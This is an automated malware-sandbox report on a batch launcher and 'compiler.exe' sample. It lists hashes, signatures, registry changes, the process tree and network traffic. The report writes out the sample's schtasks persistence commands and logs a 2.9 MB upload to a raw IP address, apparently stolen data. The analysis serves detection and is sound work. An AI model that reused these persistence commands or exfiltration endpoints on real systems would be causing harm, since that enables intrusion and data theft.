Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
55s -
max time network
59s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
13/10/2024, 20:28 UTC
Static task
static1
Behavioral task
behavioral1
Sample
Launcher.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
compiler.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
lua51.dll
Resource
win10-20240404-en
General
-
Target
Launcher.bat
-
Size
5KB
-
MD5
79e427676f790a73c7eace4401235a43
-
SHA1
522b5b923e6711bbdeff463f95b863c724a16593
-
SHA256
199066e589da3542f2540d91dccdb512561d2241ecc1199ca9fe4131566954f3
-
SHA512
5e8383871e2397ee4eccf11f2494f9196655961ddb941681e8574158dcfa19d11f42ffc97f418f5129479fddb2570e7bf3347eb8aff1d8657ea6d3b61804b804
-
SSDEEP
3:LjdIV9ZbLRJFFaR2/+ZFBW6:FIRI9FV
Malware Config
Signatures
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Setup\Scripts\ErrorHandler.cmd compiler.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2600598348" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31137198" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31137198" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b2633315be71d842a0e7430521cb4f44000000000200000000001066000000010000200000001bcea5a5733b4c694a23670d38cfd3fd71f215364fbb993c32e485d6618ed44b000000000e80000000020000200000004f88fe41e9364674098651c11616ff549642bedf760fd628bb2fc527e8263bd8200000009142c296de889da65be339074e10cb2da8c8dc4464aa8318bab2f811960a989040000000af6fd82efc4990c986bb83f846876a43e5b3de1925ac0b90dbd2d4c297c920c3d63337aeeacc6763600a0b55b8e638c18c41b6a5c5bd60c8a097e39b1f0e93ce iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2600598348" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b2633315be71d842a0e7430521cb4f44000000000200000000001066000000010000200000003a75a2b45449dab876b7e97dfb92aa57d001afcd9dd671dd4cb770ce89600661000000000e80000000020000200000004fdb5bffb321de3dc50e924085a233ef6b4814925e638025205d3ac2c109229920000000e31da2ab31c0f8d6d3a7b48d7f6f592e75876d652e42c9fcb66f3e877521e4bb40000000efdee7646adb66434fa9508f8ff4c9c1f1fee670604d3c99c95088bba468cc179f466334c82c88cb01307468c5a027a9907bb0e84dccb9beba25f5576025a867 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90978e9bae1ddb01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a06b879bae1ddb01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{C69F96D8-89A1-11EF-B03F-D68C0A96CA30} = "0" iexplore.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3564 schtasks.exe 3080 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 1932 WINWORD.EXE 1932 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4608 iexplore.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 4608 iexplore.exe 4608 iexplore.exe 1408 IEXPLORE.EXE 1408 IEXPLORE.EXE 1932 WINWORD.EXE 1932 WINWORD.EXE 1932 WINWORD.EXE 1932 WINWORD.EXE 1932 WINWORD.EXE 1932 WINWORD.EXE 1932 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1860 wrote to memory of 64 1860 cmd.exe 75 PID 1860 wrote to memory of 64 1860 cmd.exe 75 PID 1860 wrote to memory of 64 1860 cmd.exe 75 PID 64 wrote to memory of 3564 64 compiler.exe 77 PID 64 wrote to memory of 3564 64 compiler.exe 77 PID 64 wrote to memory of 3564 64 compiler.exe 77 PID 64 wrote to memory of 3080 64 compiler.exe 78 PID 64 wrote to memory of 3080 64 compiler.exe 78 PID 64 wrote to memory of 3080 64 compiler.exe 78 PID 4608 wrote to memory of 1408 4608 iexplore.exe 81 PID 4608 wrote to memory of 1408 4608 iexplore.exe 81 PID 4608 wrote to memory of 1408 4608 iexplore.exe 81
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Launcher.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Users\Admin\AppData\Local\Temp\compiler.execompiler.exe conf.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc daily /st 11:20 /f /tn ApplicationExperienceAnalysis_ODA3 /tr ""C:\Users\Admin\AppData\Local\ODA3\ODA3.exe" "C:\Users\Admin\AppData\Local\ODA3\conf.txt""3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc daily /st 11:20 /f /tn Setup /tr "C:/Windows/System32/oobe/Setup.exe" /rl highest3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3080
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\DisconnectFind.mht1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4608 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4608 CREDAT:82945 /prefetch:22⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1408
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Documents\These.docx" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1932
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4844
Network
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:208.95.112.1:80RequestGET /json/ HTTP/1.1
User-Agent: suysf5izyxr9sxo631xv9xwroxnjw0tzkuy73h40rytqqfp8uj8aq7h4j31vs38553f3opfbmqsxitr4
Host: ip-api.com
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 289
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
Remote address:8.8.8.8:53Requestwww.microsoft.comIN AResponsewww.microsoft.comIN CNAMEwww.microsoft.com-c-3.edgekey.netwww.microsoft.com-c-3.edgekey.netIN CNAMEwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netIN CNAMEe13678.dscb.akamaiedge.nete13678.dscb.akamaiedge.netIN A2.23.205.233
-
Remote address:2.23.205.233:443RequestGET / HTTP/1.1
Host: www.microsoft.com
Cache-Control: no-cache
Cookie: MUID=2C6FA802A1F9683F1A02BC55A055697D; _EDGE_V=1
ResponseHTTP/1.1 302 Moved Temporarily
Location: https://www.microsoft.com/en-gb/
Date: Sun, 13 Oct 2024 20:28:37 GMT
Connection: keep-alive
TLS_version: tls1.2
Strict-Transport-Security: max-age=31536000
ms-cv: CASMicrosoftCV228602ef.0
ms-cv-esi: CASMicrosoftCV228602ef.0
X-RTag: ARRPrd
-
Remote address:89.169.13.169:80RequestPUT /api/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1
Content-Type: multipart/form-data; boundary=m3imgimbp1oj7qszjf33osrgnbtoyvt5gn7nzmov
User-Agent: suysf5izyxr9sxo631xv9xwroxnjw0tzkuy73h40rytqqfp8uj8aq7h4j31vs38553f3opfbmqsxitr4
Host: 89.169.13.169
Content-Length: 2765898
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 13 Oct 2024 20:28:40 GMT
Content-Type: application/json
Content-Length: 696
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4DaW3UlyZq9qwwcShIPVavqKJwjvDb3MVEWiTWqkFleY7cL6o5s2xQW15uQ8KwzLhvHUOc98j0jbHu9dcNGTxcRFM%2FWwkmfrwzB8fAfgWBr1yJ%2FPs5dZe4fWW%2Fi2COLWPpbN"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
CF-RAY: 8d2213cbaf4e71c7-FRA
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Request1.112.95.208.in-addr.arpaIN PTRResponse1.112.95.208.in-addr.arpaIN PTRip-apicom
-
Remote address:8.8.8.8:53Request233.205.23.2.in-addr.arpaIN PTRResponse233.205.23.2.in-addr.arpaIN PTRa2-23-205-233deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request169.13.169.89.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestroaming.officeapps.live.comIN AResponseroaming.officeapps.live.comIN CNAMEprod.roaming1.live.com.akadns.netprod.roaming1.live.com.akadns.netIN CNAMEeur.roaming1.live.com.akadns.neteur.roaming1.live.com.akadns.netIN CNAMEfrc-azsc-000.roaming.officeapps.live.comfrc-azsc-000.roaming.officeapps.live.comIN CNAMEosiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.comosiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.comIN A52.109.68.129
-
Remote address:52.109.68.129:443RequestPOST /rs/RoamingSoapService.svc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
User-Agent: MS-WebServices/1.0
SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
Content-Length: 511
Host: roaming.officeapps.live.com
ResponseHTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
X-OfficeFE: RoamingFE_IN_220
X-OfficeVersion: 16.0.18130.30575
X-OfficeCluster: frc-000.roaming.officeapps.live.com
X-CorrelationId: 275f5d79-bace-406e-9718-64f85fb60ac3
X-Powered-By: ASP.NET
Date: Sun, 13 Oct 2024 20:29:18 GMT
Content-Length: 654
-
Remote address:8.8.8.8:53Request240.76.109.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request129.68.109.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request73.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request73.159.190.20.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request27.73.42.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request161.19.199.152.in-addr.arpaIN PTRResponse
-
365 B 558 B 5 2
HTTP Request
GET http://ip-api.com/json/HTTP Response
200 -
1.1kB 7.1kB 14 12
HTTP Request
GET https://www.microsoft.com/HTTP Response
302 -
89.169.13.169:80http://89.169.13.169/api/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Mshttpcompiler.exe2.9MB 22.0kB 2108 490
HTTP Request
PUT http://89.169.13.169/api/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2MsHTTP Response
200 -
52.109.68.129:443https://roaming.officeapps.live.com/rs/RoamingSoapService.svctls, httpWINWORD.EXE1.7kB 7.7kB 11 10
HTTP Request
POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svcHTTP Response
200
-
56 B 72 B 1 1
DNS Request
ip-api.com
DNS Response
208.95.112.1
-
63 B 230 B 1 1
DNS Request
www.microsoft.com
DNS Response
2.23.205.233
-
71 B 95 B 1 1
DNS Request
1.112.95.208.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
233.205.23.2.in-addr.arpa
-
72 B 132 B 1 1
DNS Request
169.13.169.89.in-addr.arpa
-
73 B 250 B 1 1
DNS Request
roaming.officeapps.live.com
DNS Response
52.109.68.129
-
72 B 146 B 1 1
DNS Request
240.76.109.52.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
129.68.109.52.in-addr.arpa
-
144 B 158 B 2 1
DNS Request
73.159.190.20.in-addr.arpa
DNS Request
73.159.190.20.in-addr.arpa
-
70 B 156 B 1 1
DNS Request
27.73.42.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
161.19.199.152.in-addr.arpa